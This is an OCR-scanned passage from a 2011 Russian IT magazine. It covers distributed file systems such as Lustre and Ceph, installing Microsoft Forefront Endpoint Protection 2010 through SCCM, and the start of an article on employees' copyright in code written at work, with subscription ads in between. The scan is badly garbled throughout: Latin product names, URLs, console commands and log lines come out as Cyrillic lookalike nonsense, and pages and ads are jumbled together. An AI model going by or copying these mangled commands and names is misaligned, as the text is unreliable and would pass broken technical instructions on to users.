ко машин работают в качестве серверов метаданных. Клиенты, 
желающие получить доступ к файловой системе, подключают 
[монтируют] ее, используя адрес головного сервера метаданных. 
После этого содержимое ФС становится видным в их пространстве 
имен клиента [например, в каталоге /{и5{ге]. 

При попытке прочитать/изменить какой-либо файл в этом каталоге 
происходит запрос серверу метаданных, который находитего 
информацию в своей базе данных и отправляет клиенту его атри- 
буты и ссылку на сервер, содержащий необходимый объект. При 
заполнении файловой системы информацией файлы [объекты] 
равномерно распределяются между всеми серверами хранения, 

а также дублируются на случай выхода одного из них из строя [в 
этом случае сервер метаданных автоматически изменит свою базу 
данных так, чтобы ссылки указывали на резервный сервер). 

Такая многоуровневая архитектура делает Г и${ге чрезвычайно 
масштабируемой и стойкой к сбоям. Благодаря использованию 
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С точки зрения архитектуры Серп почти ничем не отличается от ие 


нескольких серверов хранения и серверов метаданных, удает- 
ся не только сделать хранилище действительно большим, но и 
равномерно распределить нагрузку между серверами, избежав 
появления узких мест [например, если один сервер метаданных 
перестает справляться с нагрузкой, в сеть в любой момент можно 
добавить дополнительные сервера, которые смогут взять на себя 
обслуживание части клиентов). 

Кроме этого [и5{ге поддерживает возможность наложения квот 
для каждого клиента, реализует совместимую со стандартом РО$Х 
систему разделения прав доступа, позволяет настроить аутенти- 
фикацию клиентов и имеет гибкий механизм резервного копиро- 
вания. Однакоу Ги${ге есть и несколько проблем, которые зача- 


Примерно так выглядит типичный [изте-кластер 


стую приводят ктому, что для расширения файловой системы или 
при выходе из строя одного из узлов, ее приходится останавливать 
и переконфигурировать. Поэтому за последнее время родилось 
несколько проектов, призванных устранить эти недостатки. Самые 
заметные из них — это файловые системы Серп и б(а${егЕ5. 

Сер (ВИр://серВ.пем/9геат.пе была представлена миру Сэйджем 
Вилом в ноябре 2007 года, и позиционировалась, как файловая 
система, основанная на идеях 1 и{ге, но лишенная ее недостат- 
ков. Первая версия системы была основана на Гизе, но позже 
автор переписал ее в виде модуля ядра тих, который официаль- 
но стал частью Шпих, начиная с версии 2.6.34. 

Основное отличие Серп от своего прародителя заключается вее 
высокой интеллектуальности. Единожды настроив кластер, можно 
на очень долгое время забыть о его поддержке. Файловая система 
будет сама производить ребалансировку нагрузки, репликацию 
данных и их миграцию при наращивании количества серверов. 

Как говорит сам автор, начав с небольшого кластера, состоящего 
из десятка машин, вы можете постепенно добавлять в систему все 
новые машины, увеличивая размер кластера в десятки раз, и это не 
потребует серьезного вмешательства администратора. Все будет 
«просто работать». 

Второе достоинство Серй — это простота развертывания. Боль- 
шинство компонентов ФС реализованы в пространстве пользо- 
вателя, а это значит, что при добавлении нового узла в кластер 
потребуется всего лишь установить на машину пих-дистрибутив, 
несколько пакетов и исправить один конфигурационный файл. 
Благодаря наличию официального клиента файловой системы, 
основанного на Гизе, сделать клиентом ФС можно нетолько Шпих- 
машину, нои ВО или Мас 05Х. 


Выводы 


Распределенные файловые системы — это будущее систем 
хранения информации. Привычные нам настольные приложения 
постепенно смещаются в облака, где для хранения информации 
используются гигантские распределенные хранилища, состоящие 
из сотени тысяч дешевых серверов. Поэтому умение общаться ее 
технологиями, лежащими в основе таких хранилищ, будет боль- 
ШИМ ПЛЮСОМ к портфолио любого сисадмина. 7 
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ПРРЕВЕЕЕВИ 


6 номеров 564 руб. 6 номеров 785 руб. 6 номеров 1110 руб. 


6 номеров 810 руб. 
13 номеров 1105 руб. 12 номеров 1420 руб. 12 номеров 2016 руб. 


12 номеров 1470 руб. 


ОЕА О О ый — 
СРАСЕ 2, 


Поттер 
и Дары 
смерти 


6 номеров 1260 руб. 6 номеров 1260 руб. 6 номеров 900 руб. 


6 номеров 1300 руб. 
12 номеров 2200 руб. 12 номеров 2310 руб. 12 номеров 1720 руб. 


12 номеров 2300 руб. 


ПОДПИШИСЬ 


гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 


пор. 9С.ГИ 3-300-200-3-999 


30 М 

Мощь Т+А = М1 

6 номеров 1130 руб. 6 номеров 890 руб. 6 номеров 630 руб. 6 номеров 765 руб. 
12 номеров 2060 руб. 12 номеров 1630 руб. 12 номеров 1130 руб. 12 номеров 1380 руб. 


ТИРМО 5 > АГА 
6 номеров 960 руб. 6 номеров 1300 руб. 3 номера 630 руб. 6 номеров 1260 руб. 
12 номеров 1740 руб. 12 номеров 2300 руб. 6 номеров 1140 руб. 


12 номеров 2200 руб. 


(датеГапа 


МЕДИА ДЛЯ ЭНТУЗИАСТОВ 


6 номеров 2205 руб. 6 номеров 2150 руб. 6 номеров 2178 руб. 
12 номеров 3890 руб. 12 номеров 3930 руб. 12 номеров 3960 руб. 
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Конечная 
точка защиты 


ЕогеггопЕ ЕпарошЕ РгофесНоп: 
решение для защиты компьютеров с \УУт@4о\$ 


В конце 2010 года М!сго5оЙ представила комплексную систему защиты рабочих станций и серверов — 
ЕогеНоп1 Епаро! РгоесНоп, появление которой вызвало болышой интерес у специалистов по безопас- 
ности. Интересного здесь много — новая технология обновлений, простая интеграция с существующей 
инфраструктурой, комплексный подход к защите и многое другое. 


Назначение 

ГогеНоп1тЕпарой! РгоТесйоп 

Не секрет, что сегодня антивирусы являются основой системы за- 
щиты любой корпоративной сети. Ежегодно на закупку и обновление 
лицензий компании тратят огромные средства. Естественно, этот 
лакомый кусок привлекает многих, не осталась в стороне и корпора- 
ция М'сгозоН. Особо востребованы комплексные системы, позволяю- 
щие полностью защитить периметр от всех современныхугроз, как 

на рабочих местах, так и уровне сети, с возможностью централизо- 
ванного управления. Все системы сети должны проходить проверку 
на соответствие политикам безопасности — наличие антивируса, 
актуальность баз, межсетевой экран итак далее. Функцию последне- 
го берет на себя технология защиты сетевого доступа МАР (Ме\могк 
Ассез$ РгоесНоп], реализованная в \Мп2К8 и старше (смотри в статье 
«Сетевой коп» в номере 12 журнала [за 2008 год). Чтобы покрыть 

все требования, в М5 была начата разработка целого семейства, по- 
лучившего название Роге!гоп{ [ранее — 5 гИпд, названное, очевидно, 
в честь знаменитого несгибаемого замка в Шотландии}, призванное 
заменить старые продукты вроде [5А Зегуег, [{еШдеп{ АррИсаноп 
Са{е\м/ау, |4еп у [Песуце Мападек плюс внедрить новые функции. 
Гоге{гоп{ нужно понимать, как набор продуктов различного назначе- 
ния, покрывающий все необходимые требования по защите сети и ра- 
бочих станций, управлению политиками и доступом к приложениям. В 
том числе в М$ начали разработку и своего антивируса. Естественно, 
не снуля. Достаточно вспомнить М$БТ [Ма|сои$ бой\м/аге Ретома! 
Тоо|, ОпеСаге и М/пдом/з Оеепдег так что позитивный опыт в этом 
планеу них уже имеется. Первый шагбыл сделан в виде М$ 5есигйу 
Е5зепна[$ (Могго], который можно бесплатно использовать на лицен- 
зионной \\ЛпХР-\\/п7. Но для корпоративной среды МЪЕ не предна- 
значен [читай лицензию}, кроме этого в М$Е отсутствует возможность 
централизованного управления и контроля. Место корпоративного 
антивируса и был призван занять Гогегоп{ ЕпаропЕ Рг{есноп, за- 
дача которого — защита \\!п, как настольных решений, так и серверов, 
в сетях различного назначения имеющих от десятка и более компью- 
теров. Первоначально он назывался Еогегоп{ СИеп( Зесигиу, затем 
получил новое имя. Версия ЕЕР 2010 была представлена в конце 2010 
года. Сейчас активно идет разработка ЕЕР 2012, бета-релиз которой 
вышел всередине мая. 


Возможности ЕЕР 2010 

Клиент, устанавливаемый на конечных компьютерах, обеспечивает 
защиту от известных и неизвестных угроз, вирусов, шпионского ПО 
и руткитов. Чтобы удовлетворить всем требованиям, ГЕР содержит 


несколько компонентов, работающих на разном уровне — прило- 
жения, файловая система и сеть. Для выполнения своих задач он 
интегрируется с Центром безопасности \МИп9омуе, \\ММпдом/5 ЕигемаЦ, 
АррЕоскКег, управляя их настройками и отслеживая изменения в 
конфигурационных файлах системы. Во время установки клиента до- 
бавляются специальные компоненты, позволяющие строить защиту 
на уровне ядра, втом числе — и обнаруживать руткиты. Согласись, 
только у разработчиков ОС могут быть все необходимые инструменты, 
работающие на очень низком уровне, остальным вендорам приходит- 
ся как-то выкручиваться. Для защиты от многих типов сетевых атак 
ГЕР содержит [Р5 (систему предотвращения вторжения] — Ме\могк 
|пзресНоп бу${ет [№15]. Напомню, что М5 используется втом числе 
ина Гогегоп{ ТМС 2010, только в случае сЕЕР она защищает отатаки 
отдельный хост, а не сеть. Для решения своих задач клиент взаимо- 
действует и с Мемогк Ассе$$ Ргоесйоп [МАР]. 

Антивирус наряду с традиционным сигнатурным анализом ис- 
пользует и модуль динамической трансляции (Вупагтис {гапз[аНоп 
апд Ети(а{ оп), когда программа прогоняется в режиме эмуляции 

и анализируется, что она делает. Таким образом, увеличивается 
вероятность обнаружения новых вирусов. На этом этапе может вклю- 
читься в работу еще один интересный компонент, известный тем, кто 
юзает М!сго5ой Зесигйу Е5зепйа[5 — служба динамических сигнатур 
055 ([Оупагпс $!дпа{иге 5егмсе). Если во входе анализа файл будет 
расценен как подозрительный, (например, пытается сразу изме- 
нить защищенные части ОС}, но сигнатуры этого вируса в базе нет, 

то генерируется профиль файла, который отсылается для анализа 

в специальные сервисы Мгсгозо — 055, бруМе{ и МБ5 [М'сгозоН 
ВерщаНоп 5егисез). В случае, когда в базе обновлений сигнатура 
уже есть, но она не скачана, автоматически обновляются базы. В 
сигнатурах содержится не только часть «тела» вируса, но и некоторые 
типичные сценарии поведения, позволяющие однозначно опреде- 
лить зловредность программы. 

Одна из задач, которые ставилась при разработке ЕЕР — «не мешать», 
поэтому конфигурация по умолчанию рассчитана на высокий уровень 
производительности. Управление функциями ЕЕР производится на 
основе политик, и администратор может гибко настроить функции 
системы защиты в зависимости от их назначения — рабочая станция, 
файловый или почтовый сервер итак далее. В поставке доступен ряд 
предустановок, представляемых компаниями-разработчиками для 
своих продуктов. Также изначально минимизировано взаимодей- 
ствие с пользователем, который в настройках по умолчанию получает 
только действительно важные сообщения. Еще один интересный 
момент. К стандартным сканированиям [по требованию и распи- 
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санию] добавлен интеллектуальный режим, когда ЕЕР 
оценивает состояние системы и применяет решение об 
уровне проверки. Втом случае, когда вирус или руткит 
нельзя удалить на рабочей системе, будет произведена 
попытка удаления в процессе перезагрузки. В качестве 
клиентских компьютеров поддерживаются МИпХРЗ//{а/7 
и серверные версии \\/п2КЗ/2К8/2К8Б?. Управление из 
центральной консоли версиями на \\/\п'7 З<а“ег, МЛп7 
Нотеи У $а Вас не предусмотрено и установить кли- 
ентскую часть натакие компьютеры можно лишь вручную. 
В принципе почти все это мы втой или иной мере встре- 
чалиу разработчиков других антивирусных продуктов 
корпоративного уровня. Еще одна фишка ЕЕР состоит в 
том, что для централизованного управления используется 
бу$ет СещегСопйдигайоп Мападег. Последний предна- 
значен для управления группами компьютеров, установки 
и обновления ПО наних, это упрощаетустановку ЕЕР на 
конечных компьютерах. Это позволяет снизить стоимость 
владения, особенно втех случаях, если организация 

уже использует 5ССМ [подробнее читай об этом в статье 
«Начальник сети» в номере 08 журнала [за 2009 год). 
Нетнеобходимости в развертывании дополнительной 
инфраструктуры, все настройки производятся в едином 
интерфейсе, администратор сразу видит состояние всех 
компонентов сети. Опять же необходимости в переучива- 
нии персонала. Соответственно, уже готово все для сбора 
данных, последующий апдейтядер и антивирусных баз. 
Но это же является и недостатком ЕЕР, ведьесли нет, то 
ЪССМ придется его развернуть — со всеми вытекающи- 
ми из этого шага последствиями. Если корпоративную 
версию Касперского или «Др. Веб» можно установить «на 
посмотреть» за полчасика, то в случае сЕЕР тебя, воз- 
можно, ждет пара «веселых» дней :]. 


Установка $ССМ 2007 
ЮЗ на \\МЛп2к882 


Несмотря на то, что сегодня уже можно попробовать ЕЕР 
2012, рассматривать мы будем стабильный релиз 2010. 
Для работы ЕЕР 2012 понадобится и $ССМ 2012, который 
также находится в состоянии беты. Процесс установки 
их описан слабо и по ходу приходится решать много 
задач — и это несмотря нато, что он изначально зато- 
чен под \\/п2К8ЗК2. Ну ачто поделаешь, — бета. Отличия 


между ними по функциональности незначительны [по 
доступной на сегодня информации}, единственное, что 
бросается в глаза — новый интерфейс $ ССМ 2012, вы- 
полненный в стиле ОциЦоок, более удобный и понятный в 
работе. Принцип работы остался тот же, поэтому освоить 
его после выхода стабильного релиза проблем не будет. 
Установку ЕЕР 2010 следует начинать с развертывания 
ЪССМ 2007 КЗ, который вышел сразу после анонса ЕЕР. 
Так как КЗ доступен только в виде патча, вначале следует 
установить 5Р2, а затем накатить обновления. Процесс 
на примере 5ССМ 2007 $Р2 подробно описан в статье 
«Начальник сети» в номере 08 журнала [за 2009 год). 
Правда, с выходом \\Ип2К8К? некоторые моменты даже 
упростились, но взамен мы получили очередную порцию 
«сюрпризов» :]. Поэтому расскажу коротко. Все требова- 
ния ксерверным ОС остаются аналогичными 5ССМ 2007, 
то есть для сервера нам подходит ОС \МИп2КЗ5Р2/Л\Мп2К8/ 
2 плюс потребуется 51 Зегуег 2кК55Р3З/2К8/В?2. Во время 
установки базы данных, необходимо активировать на 50 


Апа(уз1$ 5егисез, [{едгаНоп Зегмсез и Керогипа 5егмсез. 


Последний нужен только для сервера отчетов, который 
может быть один на всех в сети. Причем здесьтех, кто 
хочетустановить «на посмотреть» ожидает неприятный 
сюрприз — триальная версия МЪ$ОЕ не поддержива- 
ется, годится только лицензионная 5{апдагИЕг(егризе. 
Об этом напрямую нигде в доках не сказано, просто в 
процессе проверки совместимости с $Ч |1 -сервером 
мастер установки ГЕР не обнаруживает сервисы Апа!з!$ 
и Керогипоа. Все сервисы МУЗ, в частности 5@1 Зегуег 
Адеп{ следует перевести в режим автозапуска. 

В зависимости от конфигурации может понадобиться 


создать 5РМ (5егмсе Ретс!р(е Мате] для сервиса М$$С(. 


Для этого в консоли вводим команду вида: 


>5еЕ5рп -А М55$015$\с/5г\у@1 .ехатр1е.огё:1433 
ехатр1е\т$$915ег\уег 

Веё1$Фег1п8 5егу1сеРг1пс1ра1Мате$ ог 
СМ=М$$4915егуег , СМ=Узег$ ‚,ОС=ехатр1е , ОС=ог? 
М$5015$\с/ 5г\01 .ехатр]е.огй: 1433 

Ордатед обБ]ес* 


Как видишь, процесс несложен, нужно только разобрать- 
ся в данных, которые следует ввести, ведьесли 5РМ для 


[ео 


р п 

® Подробнее о 
настройке шлюза 
удаленного доступа 
Гогегоп{ ЦАС читай 
в статье «Вход в 
цитадель» в номере 
09 журнала ] за 2010 
год. 


® Обзор Гогегоп{ 
ТМС читай в статье 
«Форпост для защиты 
периметра» в номере 
11 журнала [[ за 2009 
год. 


® Подробнее о МАР 
читай в статье «Се- 
тевой коп» в номере 
12 журнала ][ за 2008 
год], ао $ССМ — в 
статье «Начальник 
сети» номера 08 за 
2009 год. 
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Выбор типа установки Гогетоп! Епарой Ргоесйоп 2010 


учетной записи будет дублироваться, получим ошибку. В этом случае 
лучше удалить при помощи ключа «-4» все записи и добавить одну 
действительно необходимую. 

Обычно все данные можно получить, проанализировав логи. В моем 
случае это выгляделотак: 


[Мегбозе] Кефг1еуеа $01 зегуег ассоип*: Тпфегпа1: 
'ЕХАМРЕЕ\ п$$4915егуег'; Ехегпа1: 'ЕХАМРЕЕ\т$$41" 
[Мегбо5е] Кефг1еуеа $01 $РМ: М$$015$\ус/$К\@1 

[Мегбо5е] \а114а{1па $РМ. Ассоип*: ЕХАМРЕЕ\т$$4а15егуег. 
$РМ: м5$$491$\с/5г\01 


Ставим компоненты на М/п2К8Р?: 


Р5> Ттрог*-Моди1е зегуегтападег 
Р5> Ааа-М1паом$Ееафиге ВТТ$ , ВОС, Мебь-имт , меБ-Бау-Риб11$11п2 


Далее ставим 5ССМ 2007 $Р?2 как обычно. Перед запуском установки 
РЗ необходимо добавить хотфиксы КВ97 7384 [5иррог". писго$ой. 
сопп/КЬ/9 77384] иКВ2271736 (зиррог(.гисгозоН.согп/КЬ/2271736}. В 
процессе установки хотфикса мастер позволяет создать сразу и пакет 
обновления. 


Установка Еогетот{ 
Епарот1 РгоесНоп 2012 
Теперь все готово для установки серверной части ГЕР. Непосред- 
ственно перед развертыванием ЕЕР лучше всего воспользоваться 
анализатором соответствия рекомендациям Мтсгозой Гоге{гоги 
Епаро!п( Рго{есНоп 2010 (сск.ги/С-1\], который покажет, насколько 
система готова к установке ЕЕР. Соответствующий функционал есть 
и в программе установки, но запускается он почти в самом конце. 
При установке клиентской части, будет проверено наличие антиви- 
русных программ других производителей, и если таковые найдут- 
ся, они будут автоматически деинсталлированы. Архив, который 
содержит клиента и расширения для $ССМ под соответствующую 
платформу, и язык можно скачать с сайта М5. После того что мы 
пережили до этого, процесс инсталляции ЕЕР 2010 сложным назвать 
уже нельзя :]. Просто запускаем мастер и следуем его указаниям. По 
ходу следует определиться стипом установки. Предлагается четыре 
варианта (к слову, в 2012 такие же пункты, только называются чуть 
по-другому}: 
» Вазс(оро[оду — устанавливается база данных, расширение сер- 
вера и консоли 5ССМ, компоненты сервера отчетов; 
» Вазс(оро[оду мВ гето{е герог па да{аразе — то же, что и пред- 
ыдущий, только мастер позволяетуказать альтернативный сервер 
отчетов; 
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После установки серверной части ЕЕР, в консоли 5ССМ 
появляются новые пункты 
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Развертываем клиентскую часть 


» ДОуапсед{орооду — полностью настраиваемая установка, в ходе 
которой выбираются компоненты и задается произвольное раз- 
мещение базы отчетов, имена базы данных ит.д. 

» |п5(а[оп(у СопйдигаНоп Мападег Сопз(е Ежепз!оп ог ЕЕР 2010 — 

ставим только расширение консоли для 5ССМ 2007. 

Если нужно поставить вручную клиентскую часть, то выбираем 

Адуапсед {оро[оду и снимаем все флажки. 

Теперь переходим к настройкам Керогта 5егмсез. Здесь потребует- 

ся ввести ОКЕ сервиса и учетную запись с правами администратора 

домена. Причем мастер подставит УКЦ, но в формате рабочей груп- 
пы, нужно просто дополнить его полным ГООМ сервиса. 

Каки прочие, продукт М$ ЕЕР может обновляться через \\пЧо\м/з 

Ордате. Это лучший вариант, поэтому на следующем шаге масте- 

ра обязательно устанавливаем соответствующий флажок. Далее 

определяемся сучастием в М'сго5оВ 5руМе{. Отказываться здесь 

не стоит. По умолчанию предлагается вариант Вас, когда в М5 от- 

сылается минимум информации о файле. Его обычно предпочитают 
большинство пользователей, беспокоящихся о конфиденциально- 
сти, ведь в случае активации Адуапсед отправляются дополнитель- 
ные данные. Далее все стандартно. Указываем, куда ставить и ждем, 
пока отработает проверка зависимостей. В случае ошибки подсказку 
можно узнать, нажав ссылку рядом или просмотрев логи. Еще раз 
проверяем, что все указано правильно и ждем, пока закончится 
установка. Последним шагом мастер предложит проверить обнов- 
ления, лучше согласиться. Базы внутри пакета уже устарели, все 
равно придется потом активировать апдейт вручную. По окончании 
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Клиент ЕЕР очень прост, к тому же большая часть 
настроек устанавливается централизовано 


в панели появится значок клиента ЕЕР, некоторое время он будет 
«приходить в себя» пока обновится и проверит систему, затем 
значок сменит цвет на зеленый, означающий, что все в порядке. Во 
время установки клиента будет применена дефолтовая политика, 

в некоторых случаях работа компонентов 5ССМ будет блокирована 
(как правило, подключение или процессы М5$@1 и потребуется в 
дальнейшем переопределить политику. Удобнее это сделать, создав 
коллекцию, в которой сервер 5ССМ будетединственной системой. 
В консоли $ССМ в разделе Сотрщег Мападетег( появится меню 
Гогегоп{ Епаротп( Рг{есйоп, перейдя в которую мы увидим сводную 
информацию о статусе клиентов, систем защиты и политик. Все 
установки собраны втрех вкладках — Ройс!ез (управление полити- 
ками), Ает$ [настройка 4 групп уведомлений] и Керог$ (отчеты). 
Плюс несколько подпунктов, начинающихся с ЕЕР-*, будут доступны 
в Сотрщег Мападетеп{ — Оезгед СопЙйдигайоп Мападетеп{ — 
Сопйдигайоп ВазеЙпез. Следующим шагом необходимо развер- 
нуть клиенты на удаленных системах. Способов существует много, 

в том числе несколько вариантов предлагаети 5ССМ. Разберем 
«штатный». Для начала следует создать коллекции, как это делается 
подробно описано все втой же статье «Начальник сети» (журнал | 
[08.2009], описывать этот процесс сейчас смысла нет. Далее про- 
сто выбираем коллекцию и в контекстном меню пункт О!5{гще 

— ЗоН\маге. Запустится мастер, на втором шаге которого отмечаем 
Б@ес{ ап ех!5Ипа раскаде и выбираем М!сго5ой СогрогаЧоп ЕЕР 

— ОероутепЕ 1.0. Далее следуем указаниям, хотя в большинстве 
случаев ничего, за исключением выбора применяемой политики, 
изменять не нужно. По умолчанию доступно две политики — для 
клиента и сервера, просто отмечаем наиболее подходящую. Все, 
клиентская часть будетустановлена на удаленных системах. Про- 
цесс будет показан на панели мониторинга, также можно сформиро- 
вать отчет, выбрав пункт Верхутеп( Оуегле\м. 


Настройка политик 

Конфигурация клиентов задается при помощи политик. Создать, 
изменить, копировать которые можно в подменю Ро!а!ез. Новая 
политика создается при помощи пошагового мастера, появляю- 
щегося при выборе ссылки Мем/ Росу. На втором шаге следует 
определиться с типом политики. Доступны три варианта (стан- 
дартная для десктопов, повышенная защищенность и увеличен- 
ная производительность)}. Если политика создается для сервера, 
обращаемся к списку Ройсу Тегпр[ате, где предлагается еще с 
десяток шаблонов. Далее дополнительно задаются тип и время 
сканирования, каталоги которых следует исключить при скани- 
ровании, ресурс с которого получает обновления (УМС, \/5 1$ и 
М пдоми5 Урда{е). В настройках клиента флажками активируется 
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Мастер создания новой политики 
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Окно будущего $ССМ 2012 


реалтайм-защита, сканирование и предупреждения. Все, политика 

создана. Чтобы изменить установки \\!п4о\м/з Етгемиа( для выбран- 

ной политики, следует открыть окно ее свойств и перейти в соот- 
ветствующее окно. Новые политики получают больший приоритет, 

чтобы их изменить следует выбрать ссылку ЕдК Ройсу Ргеседепсе и 

расставить их как нужно. 

Ряд проверок вроде принудительного сканирования дисков можно 

выполнить, выбрав компьютер в окне $ССМ и вызвав его свойства. 

В качестве дополнительных инструментов для работы ЕЕР можно 

рекомендовать: 

® Пакетуправления безопасностью Гогегоп{ Епароп{ Рг{есйоп 
2010 Зесигцу Мападетег\ Раск. 

» Пакетуправления наблюдением за работоспособностью сервера 
Гогегоп{ Епарот( Рг{есйоп 5егуег НеаЦА Мопцогтд Мападетег( 
Раск. 

® Средства Гогегог( Епаро!п{ РгоесНоп 2010. 

Названия первых двух говорят сами за себя. Последний содержит 

ряд инструментов, позволяющих применять СРО для централизован- 

ного управления, предоставления оптимизированных параметров 
для каждой роли сервера и диагностики проблем. 


Заключение 

Учитывая интеграцию с ЪССМ, управление Еогегоп{ Епарот* 
Ргоесйоп не является сверхсложной задачей. Клиентская часть 
достаточно функциональна, чтобы доверить ей защиту своих систем. 
И несомненно, что появлениетакого продукта, как ЕЕР добавит кон- 
куренции в этом сегменте, от которой мы по-любому выиграем. == 
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Г Федотов Н.Н., специалист по компьютерной криминалистике 


|” дарь копирайтом 
В по работодателю! 


р | Возвращаем финансы, честно заработанные 


на служебных произведениях 


Необязательно быть Михалковым, чтобы стать правообладателем. На самом деле, им может стать 
каждый из нас. Из этой статьи ты узнаешь, как программист, сисадмин или даже простой эникейщик 
может подставить своего работодателя, который не сумел (не захотел, не удосужился} должным обра- 
зом оформить авторские права на программы, скрипты и прочие коды, написанные работником. 


Даже шелл-скрипт из пяти строчек — это де-юре программа для ЭВМ 
и объект интеллектуальной собственности (ст. 1225 и 1259 ГК). Атот, 
кто его написал — автор (ст. 1257}. С монопольным правом распоря- 
жаться произведением и карающим мечом копирайта в ножнах. Вез- 
де, где хоть недолго поработал айтишник, остались «правовые мины» 
в виде созданных им объектов интеллектуальной собственности. 

А теперь рассмотрим тонкую юридическую разницу между автором и 
правообладателем. 

Есть распространенное заблуждение, что, якобы, все, что находится 
на хозяйских компьютерах, принадлежит этому хозяину. Разумеется, 
это нетак, не говоря уже отом, что информация или произведения/ 
программы не могут «принадлежать» кому-либо в принципе, ибо 

не являются объектами собственности [юристы говорят «вещной 
собственности», чтобы отличать ее от интеллектуальной собствен- 
ности]. Согласно закону, «интеллектуальные права не зависятот 
права собственности на материальный носитель [(вещь}, в котором 
выражены соответствующие результаты интеллектуальной деятель- 
ности» (ст. 1227 ГК). Это значит, что совершенно не важно, на чьем 
компьютере создана программа, важно лишь, кто ее написал. 

А какже трудовые отношения? Разве не принадлежит работодателю 
все то, что создано работником в рабочее время? Разумеется, нет. Это 
нетак даже в отношении материальных объектов. А интеллектуальные 
— тем более отвязаны отвещей итерриторий. Все это регулируется ста- 
тьей 1295 ГК. К работодателю переходят права лишь нате программы 
(так называемые служебные произведения), которые были написаны 
«в пределах установленных для работника трудовых обязанностей». 
Эти обязанности должны быть прописаны втрудовом договоре или в 
должностной инструкции. Когда работник выполняет что-то сверх про- 
писанного, или когда официального перечня обязанностей вообще нет 
— нети «служебного произведения» — все остается у автора. 

Давайте рассмотрим примеры [см. таблицу). 

Думаю, из приведенных примеров идея понятна. То, что прямо не 
предусмотрено официальными трудовыми обязанностями, остается 
интеллектуальной собственностью автора. Даже еслитам кто-то 
успел написать «(с)» и название компании. 

Итак, работник частенько является правообладателем своих программ. 
Но начальство, как правило, об этом не задумывается и рассуждает по- 
нятиями Х\ века: «все, что на моей земле — мое». Такая юридическая 
дремучесть открывает возможности для умного человека. 

Кстати, если втвоем трудовом договоре написано что-нибудь про 
«авторские права», такие пункты, скорее всего, ничтожны. Потому 
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что передать права на еще не созданное произведение можно лишь 
при очень определенных условиях, по договору авторского заказа 
(ст. 1288 ГК}, с конкретным описанием, что именно автор напишет для 
заказчика. А правами на неопределенное множество произведений, 
создаваемых в будущем вообще запрещено распоряжаться (п. 4 ст. 
1233). Чтобы права перешли к работодателю, в договоре следует 
писать не о правах, а отрудовых обязанностях. 


Итак, внимательно прочитав трудовой договор и должностную 
инструкцию (которая, заметим к слову, должна быть работником 
подписана, иначе — опаньки, не считается), мы находим целый 

ряд программ, исключительные права на которые не перешли к 
работодателю. Программой для ЭВМ является как исходный текст 
на алгоритмическом языке (Си, Паскаль, Ассемблер}, так и испол- 
няемый (объектный) код. Программой является шелл-скрипт, скрипт 
на встроенном/внутреннем языке какого-либо продукта [МО все, 
1С, Квейк). Также к объектам авторских прав относятся написанные 
работником тексты, нарисованные им картинки, элементы дизайна, 
отснятые им фотографии — все, где есть хотя бы намек натворче- 
ство. К ним в полной мере применимо описанное в нашей статье. 
Такими «неслужебными» программами автор распоряжается 
полностью [п. 1 ст. 1233], может разрешать и запрещать их исполь- 
зование, причем «отсутствие запрета не считается разрешением» 
(п. 1 ст. 1229]. Предприятие же, напротив, без разрешения автора- 
правообладателя не вправе ни запустить, ни скопировать, ни 
переработать такую программу. Запускают? Используют? Значит, 
нарушаюттвои исключительные* права.За нарушение исключи- 
тельных прав предусмотренотри вида ответственности: 

® Гражданская (несут как физические, так и юридические лица); 

® Административная (только физлица]: 

® Уголовная [только физлица]. 

Вторая и третья взаимоисключающи, применяется лишь одна из 
них, в зависимости от размера нарушения (порог составляет 50 
тысяч рублей). К гражданской ответственности можно привлекать 
независимо от других, последовательно или параллельно. 


К сожалению, все эти виды ответственности хорошо работают 
лишь В руках юриста. Хорошая аналогия: апологеты и знатоки 
оружия всегда предупреждают, что нельзя угрожать стволом, если 
не готов убить опловнента: Некоторые даже договариваются до мар- 


ХАКЕР 09 /152/ 2011 


Формулировка из договора или 
должностной инструкции 


произведением 


«поддерживать функционирование 
компьютеров и иного коммуникационного 
оборудования» 


«проводить техническое обслуживание 
вычислительной техники» 


«осуществлять защиту информации в 
информационной системе предприятия» 


«создать и обслуживать веб-сайт компании» 


«разрабатывать ПО в соответствии с 
техническим заданием» 


«проводить обучение слушателей/студентов» 
для тестирования 


«создавать техническую документацию к 
выпускаемому оборудованию и ПО» 


гинальной формулировки «если достал — стреляй». Пустые угрозы 
и психологическую неготовность применить имеющееся оружие 
многие очень хорошо чувствуют. 

Поэтому и говорят, что оружие не повысит защищенности того, кто 
слаб духом. Для виктимных людей оно лишь создаст дополнитель- 
ные угрозы, не повысив шансов на победу. С юридическими про- 
цедурами примерно так же. Не стоит угрожать «подать в суд» или 
«посадить», когда не готов на самом деле ввязаться в гражданский 
процесс или уголовное дело. 

Психологической готовности тут недостаточно. Требуются еще 
некоторые знания или деньги на наемного юриста. Пустые юри- 
дические угрозы, не подкрепленные квалификацией и моральной 
готовностью, распознаются профессионалами на раз. И вызывают 
что угодно, но не испуг. 

Нашли в себе готовность? Или, может быть, есть деньги на адвоката? 
Тогда — вперед, начинаем защищать свои авторские права. 
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Является служебным 


скрипт для резервного копирования 


сигнатура для 105 $пой 


Юи7(-код сайта; составляющие сайта 
скрипты на Реи, /ауа, ]ауазсир1, РНР и т.д. 


код, написанный по официальному 
(утвержденному начальником и 
до исполнителей) ТЗ 


слайды/презентации к лекциям; вопросы 


НЕ является служебным 
произведением 


программа для учета выделенных |Р-адресов 


программа для платформы 1С по учету 
комплектующих 


БД для хранения логов коммутаторов 


программа на Си для валидации Рт|!-кода 


код, написанный по устному распоряжению 
начальника 


про грамма-оболочка для тестирования 


инсталлятор для обновления 
техдокументации 


техническая документация 


Деньги 


В ряде случаев цель автора — не в причинении максимальных не- 
приятностей работодателю (бывшему работодателю}, а в получении 
с него возможно большего количества денег. В этом случае начинать 
следует с переговоров. 

Для работника было бы ошибкой вести такие переговоры с неупол- 
номоченным сотрудником (например, с начальником департамента] 
в надежде, что тот потом передасттвои требования генеральному 
директору. Вряд ли. В бюрократической системе свои законы. Ин- 
формация [особенно, информация неприятная] там движется снизу 
вверх согромным трудом и мизерными шансами достичь вершины. 
А вотсверху вниз — все идет с ускорением и энтузиазмом. Поэтому 
запускать свою телегу следует с самого верха. 

Другая ошибка неискушенных правдоискателей — вести переговоры 
устно. И принимать сколь-нибудь серьезно слова и устные обещания. 
Поверивший хотя бы одному соглашению без бумаги с подписями и 
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УУМ/АСК 


1. Авторские права на произведения науки, литературы или 
искусства, созданные в пределах установленных для работника 
(автора] трудовых обязанностей (служебное произведение}, 
принадлежат автору. 


2. Исключительное право на служебное произведение 
принадлежит работодателю, если трудовым или иным 
